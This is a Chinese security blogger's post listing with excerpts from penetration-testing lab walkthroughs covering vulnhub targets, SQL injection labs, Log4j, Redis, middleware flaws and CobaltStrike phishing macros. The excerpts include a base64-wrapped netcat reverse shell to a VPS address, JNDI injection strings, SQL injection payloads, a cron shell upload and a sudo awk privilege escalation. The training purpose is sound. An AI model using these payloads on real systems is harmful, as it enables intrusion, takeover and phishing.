自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(54)
  • 收藏
  • 关注

原创 常见的框架漏洞练习教程

一、Thinkphp(TP)Thinkphp5x远程命令执行以及getshell。

2025-08-17 09:51:05 552

原创 Looz靶机通关教程

1.上面我们发现了账号密码,接下来我们就尝试寻找一下后台然后尝试登录。信息收集时候我们发现还有一个8081端口,我们尝试去访问一下,发现自动跳转到80端口了。4.将收集到的信息整理、分析,我们在80端口的首页源代码里面发现了一个账号密码,而这里的wp指的是wordpress.3.看到开启了80端口,那我们接着扫描一下敏感目录看一下,输入:dirsearch -u http://靶机ip。3.尝试访问一下,看到访问不到,这是因为我们的浏览器无法解析这个地址。2.我们运行一下,运行完发现就是root权限了。

2025-08-15 15:04:30 418

原创 CobaltStrike钓鱼鱼饵制作教程

4.在靶机上面新建一贯office的word文档,然后保证我们的宏可以被执行,依次点击:文件----->选项----->信任中心------->信任中心设置,点击启用。2.监听建立完成后来到:有效载荷--->office宏,然后选择我们新建的监听。2.我们到cs来到攻击--->web投递,制作一个攻击语句。5.然后打开我们之前下载好的工具,打开然后我们如图操作。3.然后在我们的靶机上新建一个快捷方式,然后如图操作。1.来到cs的攻击------>web投递,然后。5.然后来到:视图----->宏。

2025-08-11 21:06:29 494

原创 CobaltStrike安装和使用教程

4.接下来就是启动我们的客户端,输入:cd CS4.7key-mht进入cs的文件夹。然后输入:./start.sh启动我们的客户端。3.解压完成后我们输入命令:cd CS4.7key-mht 来到解压好的文件,然后输入:chmod +x ./*。1.首先我们需要将我们下载下来的压缩包上传到我们的云服务器(没有云服务器的本机也可),这一步主要是云服务器有公网地址可以访问公网的机器。4.然后测试服务端,输入:./teamserver启动我们的服务端测试,如果回显无报错那就代表可以正常运行。

2025-08-11 19:09:04 1778

原创 Beelzebub靶机通关教程

输入命令:wpscan --url=http://192.168.149.131/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive扫描出来两个用户。(4)然后我们扫描一下敏感目录,输入:dirsearch -u http://192.168.149.131,看到成功扫描到这些目录。(1)打开kali然后输入:arp-scan -l 扫描靶机ip。

2025-08-09 16:34:59 443

原创 Drippingblues靶机通关教程

(8)输入:fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip。(5)之前扫描端口的时候还有一个ftp21的端口,我们尝试一下看看能不能登录,发现没有密码直接就登录进来了。然后我们筛选后发现了一个提示,大致意思叫我们把一个网站里的歌词排列气起来然后md5解密,感觉有点扯,我们只能再寻找其他线索。(1)我们在提示里面发现,有一个提示,我们猜测可能存在dirp参数。(2)我们尝试一下dirp,发现成功了,说明存在文件包含。

2025-08-08 19:18:45 426

原创 Doubletrouble靶机通关教程

(6)然后开始爆破,输入:stegseek --crack doubletrouble.jpg /root/dict/rockyou.txt -xf output.txt。(4)然后输入:gunzip /usr/share/wordlists/rockyou.txt.gz,解压一下kali自带的字典。(2)输入:sudo awk 'BEGIN {system("/bin/bash -p")}',可以发现成功提权!(7)尝试用得到的信息登录,成功登录!(2)将文件上传访问,就可以反弹shell了。

2025-08-08 17:45:59 520

原创 SQLI-labs靶场第41~65关通关教程

id=1') and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='s',sleep(100000),1)--+打开拦截抓包就然后爆破。7.然后查看具体数据:and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),3)

2025-08-06 07:42:58 1027

原创 常见的中间件漏洞练习教程

2.接下来我们打开kali,然后在工具包里面的打开终端然后输入:python2 duqu.py -p 8009 -f /WEB-INF/web.xml 47.105.65.103。5.接着执行:curl http://47.105.65.103:8080//invoker/JMXInvokerServlet --data-binary @exp.ser。http://121.40.229.129:8080/jbossmq-httpil/HTTPServerILServlet代表有漏洞。

2025-07-31 21:37:06 1953

原创 Icai1靶机通关教程

2.然后尝试连接数据库,输入:mysql -h 192.168.192.133 -P 3306 --user=qdpmadmin --password=UcVQCMQk2STVeS6J --ssl-verify-server-cert=0。4.然后查看敏感目录,输入命令:dirsearch -u 靶机IP 然后就可以看到一些命令,查看一番后发现没有什么有用的东西。1.打开kali输入命令:arp-scan -l查看同一网段内的机器,可以看到成功扫到一台机器。1.可以看到这里框架是qdpm9.2。

2025-07-31 07:08:38 332

原创 常见CMS获取webshell的方法-靶场练习

上传文件成功后可以看到文件地址,我们去访问一下。5.然后我们去访问这个404.php文件,文件位置为:/wp-content/themes/自己模板的名称/404.php。4.上传成功后会给你一个地址,我们去访问一下这个文件夹下的木马文件,并尝试执行命令可以看到成功执行。2.然后我们解压压缩包,并在文件里面写入一个1.php的木马文件,木马内容为:<?那我们就可以直接修改幻灯片的配置。2.然后我们尝试去访问这个文件,并执行命令可以看到成功执行。6.去浏览器访问这个文件,然后去执行命令可以看到成功执行。

2025-07-30 19:15:25 1586

原创 Napping靶机通关教程

3.然乎将制作好的两个文件放在kali里面然后,监听端口:nc -lvvp 6688,然后提交http://192.168.192.128/1.html地址进行提交,监听到用户和密码了就可以获得账户和密码了。1.打开kali 使用命令:arp-scan -l扫描同一网段下的机器(kali是nat模式)成功扫描到机器。2.使用nmap扫描存在的端口和服务,看到存在80 和22端口。4.扫描一下存在的目录,可以看到存在以下目录。2.然后我们尝试登录,登录成功后可以看到。1.我们尝试去注册一个用户。

2025-07-30 07:35:05 257

原创 Breakout靶机通关教程

1.然后我启动靶机并打开我们的kali,然后使用命令:arp-scan -l扫描同一网段内的其他机器。5.整理后发现没有什么可以有用的信息,然后我们在80端口首页的源代码里面可以看到一个信息。1.我们使用命令:enum4linux 靶机ip,可以看到成功扫描到一个用户cyber。2.然后我们查看一下有哪些文件文件,然后我们在/var的文件夹下找到了一个文件。4.然后我们查看文件,有一个user.txt里面就有一个flag。3.我们尝试去解压一下这个文件,可以获得一个密码。2.然后我们在靶机上执行命令。

2025-07-29 21:40:57 376

原创 cmseasy靶机密码爆破通关教程

本文介绍了CmsEasy_7.6.3.2靶场的安装与爆破教程。安装步骤包括:下载解压到phpstudy_pro网站目录,访问网站进行安装并配置数据库连接。爆破教程演示了如何利用cookie验证机制漏洞:先随便输入账号密码,用BurpSuite拦截请求,删除cookie后设置变量并加载密码字典进行爆破,通过响应包长度(832)判断正确密码。该教程展示了基于cookie验证的Web应用安全测试方法。

2025-07-29 19:36:32 276

原创 SQLI-labs靶场第22~40关通关教程

2.我们使用报错注入可以大大的减少空格的使用,所以这里就使用报错注入,我们输入:/?4.接着查看数据库中的表,输入:?

2025-07-29 07:52:40 802

原创 常见的未授权访问漏洞靶场-练习教程

我们输入:rsync ./phpinfo.php rsync://目标靶机ip/src/home。命令:进入靶场目录:cd /etc/vulhub-master/redis/4-unacc 启动靶场:docker-compose up -d。10.上传shell到靶机,输入:rsync -av /tmp/tmp/shell rsync://靶机ip/src/etc/cr。rsync rsync://靶机ip/src/etc/crontab /tmp/tmp/crontab.txt。

2025-07-28 21:40:54 876

原创 Redis未授权访问的利用的几种方法原理以及条件

1.原理:在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。通过在本地虚拟一个redis数据库,然后将靶机的数据库设置成本地数据库的从数据库,来将恶意.so文件散布到靶机上。1.原理:Redis默认无密码且暴露在公网时,攻击者可直接连接它,并利用其​​数据备份功能​​将恶意代码伪装成普通数据,再通过修改配置让Redis把这些数据“误保存”为网站目录下的可执行文件(如。当用户访问这个文件时,木马就会被触发。

2025-07-28 21:39:31 631

原创 Jangow靶机通关教程

1.首先我们打开我们的kali,然后我们输入:arp-scan -l查看该net网段下的所有机器。2.接着我们扫描该ip下的开放的端口,输入:nmap -T4 -A -v ip。4.然后我们在wordpress目录里面找到另外一个数据库的名字和密码。3.目录扫描,我们去扫描一下该IP下的敏感目录可以看到扫描到两个目录。3.然后我们开启虚拟机后就可以看到这个界面就可以了。2.然后我们尝试一下执行我们的命令,看到命令成功执行。1.首先我们需要下载一下我们的jangow靶机。3.然后我们用蚁剑链接一下这个木马。

2025-07-27 10:27:12 467

原创 大米cms业务逻辑漏洞练习

2.然后我们开始去尝试寻找一下漏洞,我们在产品展示中发现购买商品的数量可以为负数。6.支付成功了,我们查看一下余额,看到我们的余额从0变为:6000了。5.支付成功后我们查看一下我们账户的余额(选择站内支付)4.注册登录成功后,我们尝试去支付一下看到金额为负数。3.我们先去注册一个账户,尝试去支付一下。7.说明这个存在业务逻辑漏洞。

2025-07-26 17:40:56 279

原创 Cmseasy业务逻辑漏洞练习

1.我们首先下载好我们的cmseasy的压缩包,然后解压放到我们phpstudy的www目录下。2.我们点击支付尝试一下,可以看到我们不仅不需要支付钱,反而商家会给我们返回钱。2.然后我们去访问一下这个网址,这里需要注册登录一下然后就可以了。3.我们支付后看一下是否有变化,看到余额从零变为1016820。1.我们尝试去购买商品,然后可以发现商品的数量为负数。4.这就是业务逻辑漏洞!

2025-07-26 17:24:39 141

原创 Earth靶机通关教程

2.然后在命令框里输入:nc -c sh 47.105.65.103 8090后发现没有执行,那我们就尝试用base64编码绕过一下,我们首先将:nc 47.105.65.103 8090 -e /bin/bash进行base64编码一下,然后填入:echo "填入处" | base64 -d |bash 然后输入。5.然后我们修改完之后dns解析记录后我们重新访问earth.local,尝试后发现这是一个信息发送页面,发送的消息会被加密记录在下面,但是我们不清楚具体加密方式。

2025-07-26 11:58:11 911

原创 matrix-breakout-2-morpheus靶机通关教程

4.接下来扫描敏感目录,我们直接扫描80端口就可以,25是SMTP服务、22是远程连接、81是一个自定义的登录界面、110是pop3邮件传输协议的端口。2.我们抓包后分析一下,我们可以看到post传参时后发现不止只传参我们的111,同时还传参了一个graffiti.txt。3.我们使用扫描工具去扫描这个c端,查看我们靶机的IP以及其开放的端口,打开御剑扫描工具进行扫描。3.然后我们去访问这个文件,并且去利用我们的木马去执行一个命令,可以看到执行成功了说明木马生效。4.我们用蚂剑来连接一下,成功连接。

2025-07-24 19:16:11 414

原创 Log4j2漏洞vul-hub通关教程

4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。action=${jndi:填充}2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,

2025-07-23 19:44:37 581

原创 IIS文件解析漏洞

1.首先创建一个文件内容为<?(在中间件为iis7的网站更目录下)3.我们往网站末尾加上/.php中间件就会把他当php文件处理,因为php文件被解析了所以没有显示。1. php.ini⾥的cgi.fix_pathinfo=1 开启。在iis7中⼀个文件路径/xx.jpg 后⾯加上/xx.php会将。2.然后我们去网站访问他,因为没有图像所以访问到是这样。/xx.jpg/xx.php 解析为 php ⽂件。4.我们尝试执行命令,可以看到执行成功。

2025-07-22 22:23:56 280

原创 Apache-文件解析漏洞

1.首先准备一个shell.php.jpg文件内容为:<?2.然后上传我们准备好的shell.php文件,并且打开burpsuite抓包在文件后面加空格。4.我们访问后查看到php文件,命令成功被执行。生成了一个shell.php的木马文件。5.然后去访问shell.php,访问后执行命令就可以看到命令成功执行。3.然后修改hex里面的0a然后就可以上传文件成功了。2.然后启动靶场环境去访问靶场页面,然后上传文件。

2025-07-22 22:00:39 374

原创 Vulhub-Nginx文件解析漏洞通关教程

5.来到首页后上传我们准备好的shell.php,然后打开Burpsuite打开拦截并点击发送抓包。3.然后将我们第一关的shell.php修改为shell.jpg上传我们,可以看到上传成功并且给了我们文件地址。6.文件上传成功后修改url后面的文件后缀在jpg后面加上空格空格.php回车访问,打开拦截抓包。可以看到命令可以执行了。5.然后我们在url后面加上.php中间件就会将我们的jpg文件当作php文件执行。2.接着我们我们来到我们的靶场,首先cd到我们。6.然后直接去尝试执行我们的命令,成功执行。

2025-07-22 19:42:22 427

原创 SQLI-LABS第二十一关通关教程

sqli-labs第二十一关通关教程

2025-07-22 18:20:33 271

原创 Tomato靶机通关教程

2.不过在此之前我们还得看看我们是否有ssh日志文件的权限,ubantu的ssh日志文件一般默认保存在/var/log/auth.log下。我们输入:file:///var/log/auth.log就可以看到成功读取到了他的日志文件。扫描到常用端口后我们还需要扫描一遍全端口避免遗漏,可以看到除了上面三个常用端口外还三个不常用的端口,110是pop3邮件传输,后面两个是自定意的。1.首先我们需要准备好我们的靶场文件然后直接将这个文件托入vmware虚拟机里面就可以了。就可以看到扫描出三个敏感目录。

2025-07-21 20:25:20 433

原创 AI-web1靶机通关教程

AI-WEB1靶机攻击教程

2025-07-20 16:20:25 1121

原创 UPLOAD-LABS 1-20关通关教程

UPLOAD-LABS 1-20关通关教程

2025-07-19 12:19:47 1935

原创 CTFHUB-SSRF全部通关教程

ctfhub-ssrf 通关教程

2025-07-17 21:32:17 566

原创 XXE靶机攻击教程

xxe靶机通关教程

2025-07-17 20:55:04 524

原创 墨者学院-mongoDB注入测试通关教程

墨者学院-mongoDB注入测试通关教程

2025-07-14 20:17:15 479

原创 墨者学院-SQL手工注入漏洞测试(Db2数据库)

墨者学院SQL手工注入漏洞测试(Db2数据库)通关教程。

2025-07-14 19:41:17 406

原创 墨者学院-ORACLE数据库手工注入教程

墨者学院通关oracle通关教程

2025-07-14 19:00:27 411

原创 SQLI-LABS 第二十关通关攻略

less-20

2025-07-13 19:58:35 176

原创 SQLI-LABS 第是十九关通关教程

LESS-19

2025-07-13 19:49:27 128

原创 SQL-LAMB 第十八关通关教程

less-18

2025-07-13 19:34:38 124

原创 SQLI-LABS 第十六关通关教程

SQLI-LABS less-16

2025-07-13 17:29:43 233

原创 SQLI-LABS 第十五关通关教程

SQLI-LABS第15关通关教程 less-15

2025-07-13 16:55:40 265

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除